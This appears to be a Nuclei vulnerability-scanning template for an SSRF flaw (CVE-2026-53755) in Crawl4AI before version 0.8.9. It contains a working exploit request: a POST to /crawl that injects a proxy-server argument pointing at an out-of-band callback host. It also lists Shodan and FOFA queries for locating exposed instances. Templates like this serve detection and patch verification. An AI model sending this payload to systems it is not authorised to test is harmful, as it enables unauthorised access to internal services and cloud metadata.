id: CVE-2026-53755 info: name: crawl4ai < 0.8.9 - Server Side Request Forgery author: str4k3r severity: high description: | Crawl4AI < 0.8.9 contains a server-side request forgery caused by insufficient SSRF destination checks on proxy addresses in browser and crawler configurations, letting unauthenticated attackers access internal services and cloud metadata endpoints. impact: | Unauthenticated attackers can access internal services and cloud metadata, potentially leading to sensitive information disclosure and further network compromise. remediation: | Update to version 0.8.9 or later. reference: - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-6qhc-x826-342c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cwe-id: CWE-918 metadata: verified: true max-request: 1 shodan-query: 'title:"crawl4ai"' fofa-query: 'body="crawl4ai"' tags: cve,cve2026,crawl4ai,ssrf,unauth,proxy,oast flow: http(1) && http(2) http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(body, "crawl4ai", "Crawl4AI", "Crawl4ai")' condition: and internal: true - raw: - | POST /crawl HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"urls":["http://example.com"],"browser_config":{"type":"BrowserConfig","params":{"headless":true,"extra_args":["--proxy-server=http://{{interactsh-url}}"]}},"crawler_config":{"type":"CrawlerRunConfig","params":{"cache_mode":"BYPASS","page_timeout":8000}}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(interactsh_protocol, "http", "dns")' condition: and # digest: 4b0a004830460221009cd88779212738ddc672b260bbd0539d9b9f9dcdc313aca41c11ffbde7b41238022100809e760afdced137ad13f90ca172446eaf734cbb8c166f6a1ef982c146024bd0:922c64590222798bb761d5b6d8e72950